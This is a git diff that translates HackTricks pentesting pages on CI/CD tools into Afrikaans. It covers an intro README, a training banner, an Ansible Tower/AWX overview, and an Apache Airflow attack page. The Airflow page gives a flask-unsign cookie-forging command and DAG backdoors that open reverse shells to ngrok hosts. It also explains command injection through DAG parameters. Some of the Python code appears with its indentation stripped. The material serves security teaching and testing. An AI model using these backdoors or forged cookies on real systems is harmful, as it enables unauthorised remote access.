diff --git a/src/README.md b/src/README.md index 01b146fd1..9febd33f4 100644 --- a/src/README.md +++ b/src/README.md @@ -6,35 +6,31 @@ Reading time: {{ #reading_time }}
-_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Hacktricks logo's & bewegingsontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ > [!TIP] -> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. +> Welkom op die bladsy waar jy elke **hacking trick/technique/whatever verwant aan CI/CD & Cloud** sal vind wat ek geleer het in **CTFs**, **werklike** lewe **omgewings**, **navorsing**, en **lees** navorsings en nuus. -### **Pentesting CI/CD Methodology** +### **Pentesting CI/CD Metodologie** -**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** +**In die HackTricks CI/CD Metodologie sal jy vind hoe om infrastruktuur wat verband hou met CI/CD aktiwiteite te pentest.** Lees die volgende bladsy vir 'n **inleiding:** [pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -### Pentesting Cloud Methodology +### Pentesting Cloud Metodologie -**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** +**In die HackTricks Cloud Metodologie sal jy vind hoe om wolkomgewings te pentest.** Lees die volgende bladsy vir 'n **inleiding:** [pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) -### License & Disclaimer +### Lisensie & Vrywaring -**Check them in:** +**Kyk hulle in:** [HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) -### Github Stats +### Github Statistieke -![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) +![HackTricks Cloud Github 
Statistieke](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) {{#include ./banners/hacktricks-training.md}} - - - - diff --git a/src/SUMMARY.md b/src/SUMMARY.md index feae5163c..1b1d60c58 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -505,3 +505,5 @@ + + diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md index b684cee3d..3d22ffbf2 100644 --- a/src/banners/hacktricks-training.md +++ b/src/banners/hacktricks-training.md @@ -1,17 +1,13 @@ > [!TIP] -> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +> Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +> Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) > >
> -> Support HackTricks +> Ondersteun HackTricks > -> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐩 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +> - Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +> - **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐩 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +> - **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. > >
- - - - diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md index d3fbf19e5..932ac34b4 100644 --- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md +++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md 
@@ -4,60 +4,59 @@ ## Basic Information -**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansible’s user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Tower’s REST API and command-line interface make it simple to integrate it into current tools and workflows. +**Ansible Tower** of sy oopbron weergawe [**AWX**](https://github.com/ansible/awx) is ook bekend as **Ansible se gebruikerskoppelvlak, dashboard, en REST API**. Met **rolgebaseerde toegangbeheer**, werkskedulering, en grafiese inventarisbestuur, kan jy jou Ansible-infrastruktuur vanaf 'n moderne UI bestuur. Tower se REST API en opdraglyn koppelvlak maak dit eenvoudig om dit in huidige gereedskap en werksvloeie te integreer. -**Automation Controller is a newer** version of Ansible Tower with more capabilities. +**Automation Controller is 'n nuwer** weergawe van Ansible Tower met meer vermoĂ«ns. ### Differences -According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows. +Volgens [**hierdie**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), is die hoof verskille tussen Ansible Tower en AWX die ontvangde ondersteuning en die Ansible Tower het addisionele funksies soos rolgebaseerde toegangbeheer, ondersteuning vir pasgemaakte API's, en gebruikersgedefinieerde werksvloeie. ### Tech Stack -- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs. 
-- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface. -- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data. -- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners. -- **Redis**: Redis serves as a cache and a backend for the task queue. +- **Web Interface**: Dit is die grafiese koppelvlak waar gebruikers inventarisse, akrediteer, sjablone, en werksgeleenthede kan bestuur. Dit is ontwerp om intuĂŻtief te wees en bied visualiseringe om te help met die begrip van die toestand en resultate van jou outomatiseringswerk. +- **REST API**: Alles wat jy in die webkoppelvlak kan doen, kan jy ook via die REST API doen. Dit beteken jy kan AWX/Tower met ander stelsels integreer of aksies skryf wat jy tipies in die koppelvlak sou uitvoer. +- **Database**: AWX/Tower gebruik 'n databasis (tipies PostgreSQL) om sy konfigurasie, werksresultate, en ander nodige operasionele data te stoor. +- **RabbitMQ**: Dit is die boodskapstelsel wat deur AWX/Tower gebruik word om tussen die verskillende komponente te kommunikeer, veral tussen die webdiens en die taaklopers. +- **Redis**: Redis dien as 'n kas en 'n agtergrond vir die taaklyn. ### Logical Components -- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc. -- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.. 
-- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job. -- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run. -- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials. -- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events. -- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc. -- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed. +- **Inventories**: 'n Inventaris is 'n **versameling van gasheers (of nodes)** teenoor welke **werksgeleenthede** (Ansible playbooks) kan **loop**. AWX/Tower laat jou toe om jou inventarisse te definieer en te groepeer en ondersteun ook dinamiese inventarisse wat **gasheerlyste van ander stelsels kan haal** soos AWS, Azure, ens. +- **Projects**: 'n Projek is in wese 'n **versameling van Ansible playbooks** wat afkomstig is van 'n **weergawebeheerstelsel** (soos Git) om die nuutste playbooks te trek wanneer nodig. 
+- **Templates**: Werk sjablone definieer **hoe 'n spesifieke playbook uitgevoer sal word**, wat die **inventaris**, **akrediteer**, en ander **parameters** vir die werk spesifiseer. +- **Credentials**: AWX/Tower bied 'n veilige manier om **geheime te bestuur en te stoor, soos SSH sleutels, wagwoorde, en API tokens**. Hierdie akrediteer kan met werksjablone geassosieer word sodat playbooks die nodige toegang het wanneer hulle loop. +- **Task Engine**: Dit is waar die magie gebeur. Die taak enjin is gebou op Ansible en is verantwoordelik vir **die uitvoering van die playbooks**. Werksgeleenthede word na die taak enjin gestuur, wat dan die Ansible playbooks teen die aangewese inventaris met die gespesifiseerde akrediteer uitvoer. +- **Schedulers and Callbacks**: Dit is gevorderde funksies in AWX/Tower wat toelaat dat **werksgeleenthede geskeduleer kan word** om op spesifieke tye te loop of geaktiveer te word deur eksterne gebeurtenisse. +- **Notifications**: AWX/Tower kan kennisgewings stuur gebaseer op die sukses of mislukking van werksgeleenthede. Dit ondersteun verskeie middele van kennisgewings soos e-pos, Slack boodskappe, webhooks, ens. +- **Ansible Playbooks**: Ansible playbooks is konfigurasie, ontplooiing, en orkestrasie gereedskap. Hulle beskryf die gewenste toestand van stelsels op 'n geoutomatiseerde, herhaalbare manier. Geskryf in YAML, gebruik playbooks Ansible se verklarende outomatiserings taal om konfigurasies, take, en stappe wat uitgevoer moet word te beskryf. ### Job Execution Flow -1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower. +1. **User Interaction**: 'n gebruiker kan met AWX/Tower interaksie hĂȘ of deur die **Web Interface** of die **REST API**. Hierdie bied front-end toegang tot al die funksies wat deur AWX/Tower aangebied word. 2. 
**Job Initiation**: - - The user, via the Web Interface or API, initiates a job based on a **Job Template**. - - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**. - - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution. +- Die gebruiker, via die Web Interface of API, begin 'n werk gebaseer op 'n **Job Template**. +- Die Job Template sluit verwysings in na die **Inventaris**, **Project** (wat die playbook bevat), en **Credentials**. +- By werkinitiĂ«ring, word 'n versoek na die AWX/Tower agtergrond gestuur om die werk vir uitvoering te plaas. 3. **Job Queuing**: - - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ. - - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution. +- **RabbitMQ** hanteer die boodskappe tussen die webkomponent en die taaklopers. Sodra 'n werk geĂŻnisieer is, word 'n boodskap na die taak enjin gestuur met behulp van RabbitMQ. +- **Redis** dien as die agtergrond vir die taaklyn, wat gequeue werksgeleenthede wat op uitvoering wag bestuur. 4. **Job Execution**: - - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials. - - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**. - - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**. +- Die **Task Engine** neem die gequeue werk op. Dit haal die nodige inligting van die **Database** oor die werk se geassosieerde playbook, inventaris, en akrediteer. 
+- Met die onttrokken Ansible playbook van die geassosieerde **Project**, voer die Task Engine die playbook teen die gespesifiseerde **Inventaris** nodes uit met die verskafde **Credentials**. +- Soos die playbook loop, word sy uitvoeringsuitset (logs, feite, ens.) vasgevang en in die **Database** gestoor. 5. **Job Results**: - - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**. - - Users can then view the results through the Web Interface or query them via the REST API. - - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc. +- Sodra die playbook klaar is met loop, word die resultate (sukses, mislukking, logs) in die **Database** gestoor. +- Gebruikers kan dan die resultate deur die Web Interface sien of dit via die REST API opvra. +- Gebaseer op werksuitkomste, kan **Notifications** gestuur word om gebruikers of eksterne stelsels oor die werk se status in te lig. Kennisgewings kan e-posse, Slack boodskappe, webhooks, ens. wees. 6. **External Systems Integration**: - - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more. - - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution. - - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times. +- **Inventories** kan dinamies van eksterne stelsels verkry word, wat AWX/Tower toelaat om gasheers van bronne soos AWS, Azure, VMware, en meer in te trek. +- **Projects** (playbooks) kan van weergawebeheerstelsels verkry word, wat die gebruik van op-datum playbooks tydens werksuitvoering verseker. 
+- **Schedulers and Callbacks** kan gebruik word om met ander stelsels of gereedskap te integreer, wat AWX/Tower laat reageer op eksterne triggers of werksgeleenthede op voorafbepaalde tye laat loop. ### AWX lab creation for testing -[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX: - +[**Volg die docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) is dit moontlik om docker-compose te gebruik om AWX te loop: ```bash git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version @@ -83,61 +82,56 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser # Load demo data docker exec tools_awx_1 awx-manage create_preload_data ``` - ## RBAC -### Supported roles +### Ondersteunde rolle -The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**. +Die mees bevoorregte rol word **Sisteem Administrateur** genoem. Enige iemand met hierdie rol kan **enige iets** **wysig**. -From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one. +Vanuit 'n **wit boks sekuriteit** hersiening, sal jy die **Sisteem Ouditeur rol** benodig, wat toelaat om **alle stelseldatas** te **bekyk** maar nie enige veranderinge kan aanbring nie. 'n Ander opsie sou wees om die **Organisasie Ouditeur rol** te verkry, maar dit sou beter wees om die ander een te kry.
-Expand this to get detailed description of available roles +Breek dit uit om 'n gedetailleerde beskrywing van beskikbare rolle te kry -1. **System Administrator**: - - This is the superuser role with permissions to access and modify any resource in the system. - - They can manage all organizations, teams, projects, inventories, job templates, etc. -2. **System Auditor**: - - Users with this role can view all system data but cannot make any changes. - - This role is designed for compliance and oversight. -3. **Organization Roles**: - - **Admin**: Full control over the organization's resources. - - **Auditor**: View-only access to the organization's resources. - - **Member**: Basic membership in an organization without any specific permissions. - - **Execute**: Can run job templates within the organization. - - **Read**: Can view the organization’s resources. -4. **Project Roles**: - - **Admin**: Can manage and modify the project. - - **Use**: Can use the project in a job template. - - **Update**: Can update project using SCM (source control). -5. **Inventory Roles**: - - **Admin**: Can manage and modify the inventory. - - **Ad Hoc**: Can run ad hoc commands on the inventory. - - **Update**: Can update the inventory source. - - **Use**: Can use the inventory in a job template. - - **Read**: View-only access. -6. **Job Template Roles**: - - **Admin**: Can manage and modify the job template. - - **Execute**: Can run the job. - - **Read**: View-only access. -7. **Credential Roles**: - - **Admin**: Can manage and modify the credentials. - - **Use**: Can use the credentials in job templates or other relevant resources. - - **Read**: View-only access. -8. **Team Roles**: - - **Member**: Part of the team but without any specific permissions. - - **Admin**: Can manage the team's members and associated resources. -9. **Workflow Roles**: - - **Admin**: Can manage and modify the workflow. - - **Execute**: Can run the workflow. - - **Read**: View-only access. +1. 
**Sisteem Administrateur**: +- Dit is die supergebruiker rol met toestemmings om toegang te verkry en enige hulpbron in die stelsel te wysig. +- Hulle kan alle organisasies, spanne, projekte, inventarisse, werksjablone, ens. bestuur. +2. **Sisteem Ouditeur**: +- Gebruikers met hierdie rol kan alle stelseldatas bekijk maar nie enige veranderinge aanbring nie. +- Hierdie rol is ontwerp vir nakoming en toesig. +3. **Organisasie Rolle**: +- **Admin**: Volle beheer oor die organisasie se hulpbronne. +- **Ouditeur**: Slegs lees toegang tot die organisasie se hulpbronne. +- **Lid**: Basiese lidmaatskap in 'n organisasie sonder enige spesifieke toestemmings. +- **Voer Uit**: Kan werksjablone binne die organisasie uitvoer. +- **Lees**: Kan die organisasie se hulpbronne bekijk. +4. **Projekt Rolle**: +- **Admin**: Kan die projek bestuur en wysig. +- **Gebruik**: Kan die projek in 'n werksjabloon gebruik. +- **Opdateer**: Kan die projek opdateer met SCM (bronbeheer). +5. **Inventaris Rolle**: +- **Admin**: Kan die inventaris bestuur en wysig. +- **Ad Hoc**: Kan ad hoc opdragte op die inventaris uitvoer. +- **Opdateer**: Kan die inventarisbron opdateer. +- **Gebruik**: Kan die inventaris in 'n werksjabloon gebruik. +- **Lees**: Slegs lees toegang. +6. **Werksjabloon Rolle**: +- **Admin**: Kan die werksjabloon bestuur en wysig. +- **Voer Uit**: Kan die werk uitvoer. +- **Lees**: Slegs lees toegang. +7. **Geloofsbriewe Rolle**: +- **Admin**: Kan die geloofsbriewe bestuur en wysig. +- **Gebruik**: Kan die geloofsbriewe in werksjablone of ander relevante hulpbronne gebruik. +- **Lees**: Slegs lees toegang. +8. **Span Rolle**: +- **Lid**: Deel van die span maar sonder enige spesifieke toestemmings. +- **Admin**: Kan die span se lede en geassosieerde hulpbronne bestuur. +9. **Werkvloei Rolle**: +- **Admin**: Kan die werkvloei bestuur en wysig. +- **Voer Uit**: Kan die werkvloei uitvoer. +- **Lees**: Slegs lees toegang.
{{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md index aac46128c..389611d80 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/README.md +++ b/src/pentesting-ci-cd/apache-airflow-security/README.md 
@@ -2,22 +2,21 @@ {{#include ../../banners/hacktricks-training.md}} -### Basic Information +### Basiese Inligting -[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications. +[**Apache Airflow**](https://airflow.apache.org) dien as 'n platform vir **die orkestrering en skedulering van datapipelines of werksvloei**. Die term "orkestrering" in die konteks van datapipelines dui op die proses van die rangskikking, koördinering en bestuur van komplekse dataverkies wat uit verskeie bronne ontstaan. Die primĂȘre doel van hierdie georkestreerde datapipelines is om verwerkte en verbruikbare datastelle te verskaf. Hierdie datastelle word wyd gebruik deur 'n menigte toepassings, insluitend maar nie beperk tot besigheidsintelligensie-instrumente, datawetenskap en masjienleer modelle, wat almal fundamenteel is vir die funksionering van groot data toepassings. -Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**. +Basies sal Apache Airflow jou toelaat om **die uitvoering van kode te skeduleer wanneer iets** (gebeurtenis, cron) **gebeur**. 
-### Local Lab +### Plaaslike Laboratorium #### Docker-Compose -You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). +Jy kan die **docker-compose konfigurasie lĂȘer van** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) gebruik om 'n volledige apache airflow docker omgewing te begin. (As jy op MacOS is, maak seker jy gee ten minste 6GB RAM aan die docker VM). #### Minikube -One easy way to **run apache airflo**w is to run it **with minikube**: - +Een maklike manier om **apache airflow** te **hardloop is om dit met minikube** te hardloop: ```bash helm repo add airflow-stable https://airflow-helm.github.io/charts helm repo update @@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow # Use this command to delete it helm delete airflow-release ``` +### Airflow Konfigurasie -### Airflow Configuration - -Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: +Airflow mag **sensitiewe inligting** in sy konfigurasie stoor of jy kan swak konfigurasies in plek vind: {{#ref}} airflow-configuration.md 
@@ -38,65 +36,62 @@ airflow-configuration.md ### Airflow RBAC -Before start attacking Airflow you should understand **how permissions work**: +Voordat jy begin om Airflow aan te val, moet jy verstaan **hoe toestemmings werk**: {{#ref}} airflow-rbac.md {{#endref}} -### Attacks +### Aanvalle -#### Web Console Enumeration +#### Web Konsolering -If you have **access to the web console** you might be able to access some or all of the following information: +As jy **toegang tot die webkonsol** het, mag jy in staat wees om sommige of al die volgende inligting te bekom: -- **Variables** (Custom sensitive information might be stored here) -- **Connections** (Custom sensitive information might be stored here) - - Access them in `http:///connection/list/` -- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) -- List **users & roles** -- **Code of each DAG** (which might contain interesting info) +- **Veranderlikes** (Pasgemaakte sensitiewe inligting mag hier gestoor word) +- **Verbindings** (Pasgemaakte sensitiewe inligting mag hier gestoor word) +- Toegang tot hulle in `http:///connection/list/` +- [**Konfigurasie**](./#airflow-configuration) (Sensitiewe inligting soos die **`secret_key`** en wagwoorde mag hier gestoor word) +- Lys **gebruikers & rolle** +- **Kode van elke DAG** (wat interessante inligting mag bevat) -#### Retrieve Variables Values +#### Herwin Veranderlikes Waardes -Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\ -Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**. 
+Veranderlikes kan in Airflow gestoor word sodat die **DAGs** hul waardes kan **toegang**. Dit is soortgelyk aan geheime van ander platforms. As jy **genoeg toestemmings** het, kan jy hulle in die GUI in `http:///variable/list/` toegang.\ +Airflow sal standaard die waarde van die veranderlike in die GUI wys, egter, volgens [**hierdie**](https://marclamberti.com/blog/variables-with-apache-airflow/) is dit moontlik om 'n **lys van veranderlikes** in te stel waarvan die **waarde** as **sterretjies** in die **GUI** sal verskyn. ![](<../../images/image (164).png>) -However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\ -To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\ -Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it: +Egter, hierdie **waardes** kan steeds **herwin** word via **CLI** (jy moet DB toegang hĂȘ), **arbitraire DAG** uitvoering, **API** toegang tot die veranderlikes eindpunt (die API moet geaktiveer wees), en **selfs die GUI self!**\ +Om toegang tot daardie waardes vanaf die GUI te verkry, kies net die **veranderlikes** wat jy wil toegang en **klik op Aksies -> Eksporteer**.\ +'n Ander manier is om 'n **bruteforce** op die **verborge waarde** uit te voer deur die **soekfilter** totdat jy dit kry: ![](<../../images/image (152).png>) -#### Privilege Escalation - -If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**. 
+#### Privilege Escalatie +As die **`expose_config`** konfigurasie op **Waar** gestel is, kan die **rol Gebruiker** en **bo** die **konfig in die web** **lees**. In hierdie konfig, verskyn die **`secret_key`**, wat beteken enige gebruiker met hierdie geldige kan **sy eie onderteken koekie skep om enige ander gebruikersrekening na te boots**. ```bash flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}" ``` - #### DAG Backdoor (RCE in Airflow worker) -If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ -Note that this reverse shell is going to be executed inside an **airflow worker container**: - +As jy **skrywe toegang** het tot die plek waar die **DAGs gestoor word**, kan jy eenvoudig **een skep** wat vir jou 'n **omgekeerde skulp** sal stuur.\ +Let daarop dat hierdie omgekeerde skulp binne 'n **airflow worker container** uitgevoer gaan word: ```python import pendulum from airflow import DAG from airflow.operators.bash import BashOperator with DAG( - dag_id='rev_shell_bash', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_bash', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = BashOperator( - task_id='run', - bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', - ) +run = BashOperator( +task_id='run', +bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', +) ``` ```python 
@@ -105,75 +100,66 @@ from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") +s = socket.socket() +s.connect((rhost, port)) +[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +pty.spawn("/bin/sh") with DAG( - dag_id='rev_shell_python', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_python', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = PythonOperator( - task_id='rs_python', - python_callable=rs, - op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} - ) +run = PythonOperator( +task_id='rs_python', +python_callable=rs, +op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} +) ``` - #### DAG Backdoor (RCE in Airflow scheduler) -If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder. - +As jy iets stel om **uitgevoer te word in die wortel van die kode**, op die oomblik van hierdie skrywe, sal dit **deur die skeduleerder uitgevoer word** na 'n paar sekondes nadat dit binne die DAG se gids geplaas is. 
```python import pendulum, socket, os, pty from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") +s = socket.socket() +s.connect((rhost, port)) +[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +pty.spawn("/bin/sh") rs("2.tcp.ngrok.io", 14403) with DAG( - dag_id='rev_shell_python2', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_python2', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = PythonOperator( - task_id='rs_python2', - python_callable=rs, - op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} +run = PythonOperator( +task_id='rs_python2', +python_callable=rs, +op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} ``` +#### DAG Skepping -#### DAG Creation +As jy daarin slaag om 'n **masjien binne die DAG-kluster te kompromitteer**, kan jy nuwe **DAG-skripte** in die `dags/` gids skep en hulle sal **in die res van die masjiene** binne die DAG-kluster **gekopieer word**. -If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster. 
+#### DAG Kode Inspuiting -#### DAG Code Injection +Wanneer jy 'n DAG vanaf die GUI uitvoer, kan jy **argumente** aan dit **oorgee**.\ +Daarom, as die DAG nie behoorlik gekodeer is nie, kan dit **kwulnerabel wees vir Opdrag Inspuiting.**\ +Dit is wat in hierdie CVE gebeur het: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927) -When you execute a DAG from the GUI you can **pass arguments** to it.\ -Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\ -That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927) - -All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**. - -Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**: +Alles wat jy moet weet om **te begin soek na opdrag inspuitings in DAGs** is dat **parameters** met die kode **`dag_run.conf.get("param_name")`** **toegang verkry**. +Boonop kan dieselfde kwesbaarheid voorkom met **veranderlikes** (let daarop dat jy met genoeg voorregte die **waarde van die veranderlikes** in die GUI kan **beheer**). Veranderlikes word **toegang verkry met**: ```python from airflow.models import Variable [...] foo = Variable.get("foo") ``` - -If they are used for example inside a a bash command, you could perform a command injection. +As hulle byvoorbeeld binne 'n bash-opdrag gebruik word, kan jy 'n 